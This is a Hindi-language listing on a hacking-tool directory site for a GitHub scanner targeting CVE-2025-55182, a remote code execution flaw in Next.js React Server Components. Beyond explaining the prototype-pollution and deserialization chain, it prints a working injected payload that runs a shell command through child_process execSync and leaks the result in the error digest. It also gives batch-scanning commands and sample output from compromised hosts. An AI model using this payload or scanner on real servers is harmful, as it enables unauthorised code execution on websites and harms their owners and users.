Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Scanner — CVE-2025-55182 के लिए सुरक्षा स्कैनर - React Server Components में गंभीर RCE भेद्यता | Kitploit
उपकरण/GitHubGitHub/f0xyx/cve-2025-55182-scanner
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

CVE-2025-55182 के लिए सुरक्षा स्कैनर - React Server Components में गंभीर RCE भेद्यता

रिपॉजिटरी देखें
119 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE‑2025‑55182 – Next.js RSC Deserialization RCE स्कैनर

यह टूल जाँचता है कि कोई लक्ष्य CVE‑2025‑55182 के प्रति संवेदनशील है या नहीं, जो Next.js के अंदर RSC (React Server Components) मॉडल पेलोड के असुरक्षित संचालन के कारण होने वाला एक Remote Code Execution बग है।
इस भेद्यता में प्रोटोटाइप पॉल्यूशन → डिसीरियलाइज़ेशन दुरुपयोग → सर्वर-साइड जावास्क्रिप्ट निष्पादन की श्रृंखला है।

अस्वीकरण: इसका उपयोग केवल उन सिस्टम पर करें जिनके आप कानूनी मालिक हैं या जिनके लिए आपके पास स्पष्ट अनुमति है। अनधिकृत परीक्षण = अपराध, भाई।


🔥 यह भेद्यता कैसे काम करती है

Next.js आंतरिक रूप से multipart/form-data के माध्यम से भेजे गए विशेष “मॉडल” ऑब्जेक्ट को प्रोसेस करता है।
यदि कोई हमलावर जाली thenable जैसी दुर्भावनापूर्ण संरचना इंजेक्ट करता है, तो वे इन्हें दूषित कर सकते हैं:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • और अन्य इंटरनल्स

इससे सर्वर हमलावर-नियंत्रित जावास्क्रिप्ट का मूल्यांकन करता है, जिसके परिणामस्वरूप पूर्ण RCE होता है।


📌 यह स्क्रिप्ट क्या करती है

  • एक एकल URL (-u) या लक्ष्यों की सूची (-l) स्वीकार करता है
  • एक निर्मित मल्टीपार्ट/डिसीरियलाइज़ेशन पेलोड भेजता है
  • सर्वर त्रुटि डाइजेस्ट से कमांड आउटपुट (id) निकालता है
  • संवेदनशील होस्ट को foxvuln.txt में सहेजता है

▶ उपयोग

एकल URL

root@kitploit:~
python3 main.py -u https://target.com

सूची मोड

root@kitploit:~
python3 main.py -l list.txt

📦 पेलोड अवलोकन

पेलोड इंजेक्टेड _prefix के माध्यम से process.mainModule.require('child_process').execSync() का दुरुपयोग करता है:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

यह सर्वर को id निष्पादित करने और परिणाम को फेंके गए डाइजेस्ट के अंदर लीक करने के लिए मजबूर करता है (क्योंकि RSC त्रुटियाँ जानबूझकर एक संरचित “digest” फ़ील्ड लौटाती हैं)।


🧪 उदाहरण आउटपुट

संवेदनशील लक्ष्य:

root@kitploit:~
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

संवेदनशील नहीं:

root@kitploit:~
[+] Testing: https://secure.com
[NOT VULN]

🗂 आउटपुट फ़ाइल

सभी पुष्टिकृत संवेदनशील URL इसमें सहेजे जाते हैं:

root@kitploit:~
foxvuln.txt

प्रारूप:

root@kitploit:~
https://victim.com => uid=1000(www-data)

🧠 नोट्स

  • केवल उन एंडपॉइंट पर काम करता है जो Next.js RSC स्ट्रीमिंग पेलोड को प्रोसेस करते हैं
  • रूट्स को ब्रूट-फ़ोर्स नहीं करता — मानता है कि होस्ट POST को / पर प्रोसेस करता है
  • प्रति होस्ट टाइमआउट 10 सेकंड है
  • प्रयोगशाला वातावरण के लिए पूरी तरह से सुरक्षित — लेकिन इसे यादृच्छिक सर्वर पर न चलाएं जब तक कि आप एक आपराधिक रिकॉर्ड की स्पीडरन नहीं करना चाहते
टूल डाउनलोड करें